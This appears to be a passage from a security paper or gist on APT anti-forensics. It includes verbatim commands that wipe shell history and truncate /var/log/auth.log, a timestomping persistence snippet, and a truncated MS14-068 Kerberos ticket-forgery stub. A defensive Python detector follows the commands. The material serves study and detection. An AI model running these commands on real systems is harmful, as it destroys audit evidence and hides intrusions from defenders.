DEMOs: history nullification, persistence, privilege evasion.
Highly productive APT groups combine phishing and social engineering for persistent access\cite{falliere2011w32, cardenas2011attacks, maiorca2019digital, urbina2016limiting}. They usually share similar strategic goals, and cleaning or faking history increases the impact of those goals.
An example of common history cleaning:
{\footnotesize
\begin{verbatim}
ln /dev/null ~/.bash_history -sf   # point the history file at /dev/null
kill -9 $$                         # kill the current session
history -c                         # clear in-memory session history
echo "" > /var/log/auth.log        # truncate the auth log
export HISTFILESIZE=0              # zero-length history file
export HISTSIZE=0                  # keep no commands in memory
unset HISTFILE                     # disable the history file entirely
\end{verbatim}
}
An example of trickier persistence:
{\footnotesize
\begin{verbatim}
## nologin passwd
## put authorizations in man, backup, daemon, bin.
## create crontabs for that.
SHELLS_TS=$(stat -c '%y' /etc/shells)   # record a legitimate timestamp
# malicious logic goes here, then reset timestamps to match
touch -d "$SHELLS_TS" \
    /lib/modprobe.d/ /media/cdrom1/ \
    /usr/local/lib /etc/tmux.cf \
    /lib/modprobe.d/systemctrl.conf \
    /media/cdrom1/debian.iso \
    /usr/local/lib/python3.9
## now (/etc/passwd)(/usr/sbin/nologin) compromised
\end{verbatim}
}
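Both tricks above leave traces a defender can check for cheaply. The following added example (my code, not part of the gist) flags a shell history file symlinked to a null device and files whose mtime has been rewound relative to ctime; the caller supplies the paths to sweep, and the location names in the docstrings are taken from the demo above.

```python
"""Added defender-side checks for the two tricks shown above (example code,
not part of the original gist).

- A history file symlinked to /dev/null (the `ln -sf` trick).
- Timestamp resets with `touch -d`: touch can rewind atime/mtime, but the
  kernel stamps ctime with the current time on every metadata change and
  offers no interface to set it, so mtime far older than ctime is a cheap
  triage signal for recently planted files.
"""
import os
from pathlib import Path

NULL_DEVICES = {"/dev/null", "/dev/zero"}


def history_redirected(path: Path) -> bool:
    """True if `path` is a symlink whose target is a null device."""
    return path.is_symlink() and os.readlink(path) in NULL_DEVICES


def timestomp_suspect(path: Path, skew_seconds: int = 3600) -> bool:
    """True if ctime is more than `skew_seconds` newer than mtime.

    Legitimate causes exist (package managers preserving mtime, chmod on
    old files), so a hit is a lead to triage, not proof of tampering.
    """
    st = path.lstat()
    return (st.st_ctime - st.st_mtime) > skew_seconds


def sweep(paths, history_suffixes=("_history",)):
    """Return {path: [finding, ...]} for the paths that show an indicator.

    `paths` is whatever a real job would enumerate: home directories plus
    the locations named in the persistence demo (/lib/modprobe.d,
    /usr/local/lib, /etc/tmux.cf, ...). Missing paths are skipped.
    """
    findings = {}
    for p in map(Path, paths):
        hits = []
        if p.name.endswith(history_suffixes) and history_redirected(p):
            hits.append("history-symlink-to-null")
        elif not p.is_symlink() and p.exists() and timestomp_suspect(p):
            hits.append("mtime-older-than-ctime")
        if hits:
            findings[str(p)] = hits
    return findings
```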
Beyond hard-to-detect history clearing and persistence, attackers can also bypass intrusion detection and prevention by gaining the highest privilege. Even in a cloud environment, an attacker could forge a ticket to obtain the session key of a domain administrator, as with MS14-068 against Kerberos-based Azure cloud environments.
{\footnotesize
\begin{verbatim}
def sploit(user_realm, user_name,
           user_sid, user_key, kdc_a, kdc_b,
           target_realm, target_service,
           target_host, output_filename,
           krbtgt_a_key=None,
           trust_ab_key=None,
           target_key=None):
    ..
    session_key = \
        (int(as_rep_enc['key']['keytype']),
         str(as_rep_enc['key']['keyvalue']))
\end{verbatim}
}